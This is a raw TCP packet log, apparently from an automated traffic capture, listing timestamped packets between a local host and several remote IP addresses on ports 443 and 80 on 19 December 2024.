                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:36.986193895 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.008126020 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.008183002 CET49725443192.168.2.7172.217.19.228
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.008196115 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.019572020 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.019629955 CET49725443192.168.2.7172.217.19.228
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.019645929 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.022628069 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.022684097 CET49725443192.168.2.7172.217.19.228
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.022691011 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.053941011 CET44349723172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.054450989 CET49723443192.168.2.7172.217.19.228
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.054488897 CET44349723172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.072343111 CET49725443192.168.2.7172.217.19.228
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.072370052 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.119123936 CET49725443192.168.2.7172.217.19.228
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.119141102 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.166001081 CET49725443192.168.2.7172.217.19.228
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.173429012 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.180465937 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.180530071 CET49725443192.168.2.7172.217.19.228
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.180546045 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.193983078 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.194032907 CET49725443192.168.2.7172.217.19.228
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.194050074 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.207575083 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.207624912 CET49725443192.168.2.7172.217.19.228
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.207642078 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.221496105 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.221564054 CET49725443192.168.2.7172.217.19.228
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.221577883 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.237971067 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.238018990 CET49725443192.168.2.7172.217.19.228
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.238033056 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.249969959 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.250017881 CET49725443192.168.2.7172.217.19.228
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.250034094 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.262411118 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.262465954 CET49725443192.168.2.7172.217.19.228
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.262481928 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.278891087 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.278933048 CET49725443192.168.2.7172.217.19.228
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.278948069 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.322247028 CET49725443192.168.2.7172.217.19.228
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.322266102 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.329895973 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.329950094 CET49725443192.168.2.7172.217.19.228
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.329965115 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.342410088 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.342447996 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.342458963 CET49725443192.168.2.7172.217.19.228
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.342473984 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.342509031 CET49725443192.168.2.7172.217.19.228
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.350684881 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.369898081 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.369971037 CET49725443192.168.2.7172.217.19.228
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.369987965 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.380398989 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.380450010 CET49725443192.168.2.7172.217.19.228
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.380465031 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.382905006 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.382961988 CET49725443192.168.2.7172.217.19.228
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.382973909 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.389631987 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.389691114 CET49725443192.168.2.7172.217.19.228
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.389707088 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.397821903 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.397871017 CET49725443192.168.2.7172.217.19.228
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.397886038 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.405394077 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.405441046 CET49725443192.168.2.7172.217.19.228
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.405455112 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.417793989 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.417853117 CET49725443192.168.2.7172.217.19.228
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.417871952 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.428042889 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.428100109 CET49725443192.168.2.7172.217.19.228
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.428117037 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.438791990 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.438833952 CET49725443192.168.2.7172.217.19.228
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.438847065 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.449197054 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.449249029 CET49725443192.168.2.7172.217.19.228
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.449265003 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.458941936 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.459026098 CET49725443192.168.2.7172.217.19.228
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.459041119 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.469137907 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.469223976 CET49725443192.168.2.7172.217.19.228
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.469239950 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.479533911 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.479593992 CET49725443192.168.2.7172.217.19.228
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.479609966 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.490502119 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.490561008 CET49725443192.168.2.7172.217.19.228
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.490576982 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.499248028 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.499309063 CET49725443192.168.2.7172.217.19.228
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.499331951 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.509438038 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.509500027 CET49725443192.168.2.7172.217.19.228
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.509516001 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.517796040 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.517862082 CET49725443192.168.2.7172.217.19.228
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.517878056 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.526644945 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.526738882 CET49725443192.168.2.7172.217.19.228
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.526753902 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.535183907 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.535233021 CET49725443192.168.2.7172.217.19.228
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.535247087 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.543453932 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.543567896 CET49725443192.168.2.7172.217.19.228
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.543585062 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.551719904 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.551769018 CET49725443192.168.2.7172.217.19.228
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.551784039 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.560193062 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.560305119 CET49725443192.168.2.7172.217.19.228
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.560313940 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.568411112 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.568500996 CET49725443192.168.2.7172.217.19.228
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.568509102 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.573589087 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.573662043 CET49725443192.168.2.7172.217.19.228
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.573669910 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.578841925 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.578917027 CET49725443192.168.2.7172.217.19.228
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.578922987 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.584273100 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.584347010 CET49725443192.168.2.7172.217.19.228
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.584353924 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.589535952 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.589626074 CET49725443192.168.2.7172.217.19.228
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.589632988 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.594779968 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.594854116 CET49725443192.168.2.7172.217.19.228
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.594868898 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.599678040 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.599765062 CET49725443192.168.2.7172.217.19.228
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.599771976 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.605038881 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.605117083 CET49725443192.168.2.7172.217.19.228
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.605123997 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.610024929 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.610101938 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.610102892 CET49725443192.168.2.7172.217.19.228
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.610130072 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.610176086 CET49725443192.168.2.7172.217.19.228
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.610466003 CET49725443192.168.2.7172.217.19.228
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.610560894 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.610644102 CET49725443192.168.2.7172.217.19.228
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:39.420221090 CET49736443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:39.420289993 CET4434973694.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:39.420351028 CET49736443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:39.421140909 CET49736443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:39.421163082 CET4434973694.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:40.379538059 CET8049700217.20.58.98192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:40.379667044 CET4970080192.168.2.7217.20.58.98
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:40.379667044 CET4970080192.168.2.7217.20.58.98
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:40.477914095 CET49717443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:40.477993011 CET49723443192.168.2.7172.217.19.228
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:40.478173971 CET4434971794.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:40.478261948 CET49717443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:40.478338003 CET49737443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:40.478379011 CET4434973794.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:40.478509903 CET49737443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:40.478699923 CET49737443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:40.478709936 CET4434973794.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:40.499414921 CET8049700217.20.58.98192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:40.831867933 CET4434973694.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:40.831957102 CET49736443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:40.843852043 CET49736443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:40.843888998 CET4434973694.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:40.844660997 CET4434973694.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:40.844757080 CET49736443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:40.845494032 CET49736443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:40.887383938 CET4434973694.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:41.879441977 CET4434973694.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:41.879518032 CET49736443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:41.879559994 CET4434973694.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:41.879614115 CET49736443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:41.879614115 CET4434973694.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:41.879659891 CET49736443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:41.880606890 CET4434973794.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:41.880677938 CET49737443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:41.888407946 CET49736443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:41.888444901 CET4434973694.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:41.892286062 CET49737443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:41.892314911 CET4434973794.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:41.892694950 CET4434973794.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:41.892755032 CET49737443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:41.895697117 CET49737443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:41.895797968 CET49737443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:41.895823002 CET4434973794.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:41.895879030 CET49737443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:41.895884037 CET4434973794.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:41.896111012 CET49737443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:41.896123886 CET49737443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:41.896147966 CET4434973794.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:41.896198988 CET49737443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:41.896203041 CET4434973794.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:41.896230936 CET49737443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:41.896241903 CET4434973794.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:41.896303892 CET49737443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:41.896317005 CET49737443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:41.896337986 CET49737443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:41.896348953 CET4434973794.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:41.896357059 CET4434973794.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:41.896373987 CET49737443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:41.896390915 CET4434973794.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:41.896529913 CET49737443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:41.896539927 CET4434973794.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:41.896554947 CET49737443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:41.896565914 CET4434973794.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:41.896605015 CET49737443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:41.896619081 CET4434973794.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:41.896630049 CET49737443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:41.896636963 CET4434973794.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:41.896646023 CET49737443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:41.896653891 CET4434973794.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:41.896760941 CET49737443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:41.896775961 CET4434973794.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:41.896792889 CET49737443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:41.896801949 CET4434973794.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:41.896811008 CET49737443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:41.943342924 CET4434973794.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:42.016748905 CET4969980192.168.2.7192.229.221.95
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:42.016923904 CET4969880192.168.2.7192.229.221.95
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:42.136562109 CET8049699192.229.221.95192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:42.136635065 CET4969980192.168.2.7192.229.221.95
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:42.137114048 CET8049698192.229.221.95192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:42.137974024 CET4969880192.168.2.7192.229.221.95
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:42.543495893 CET49739443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:42.543540955 CET4434973994.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:42.543658018 CET49739443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:42.544074059 CET49739443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:42.544087887 CET4434973994.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:42.644100904 CET8049702217.20.58.98192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:42.644226074 CET4970280192.168.2.7217.20.58.98
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:42.644259930 CET4970280192.168.2.7217.20.58.98
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:42.763823986 CET8049702217.20.58.98192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:43.788954020 CET4434973794.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:43.789027929 CET49737443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:43.789076090 CET4434973794.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:43.789237022 CET49737443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:43.789254904 CET4434973794.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:43.789503098 CET49737443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:43.789921045 CET49737443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:43.789948940 CET4434973794.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:43.947560072 CET4434973994.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:43.947679996 CET49739443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:43.948185921 CET49739443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:43.948213100 CET4434973994.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:43.949839115 CET49739443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:43.949851036 CET4434973994.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:43.949971914 CET49739443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:43.949999094 CET4434973994.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:43.950093031 CET49739443192.168.2.794.130.191.168
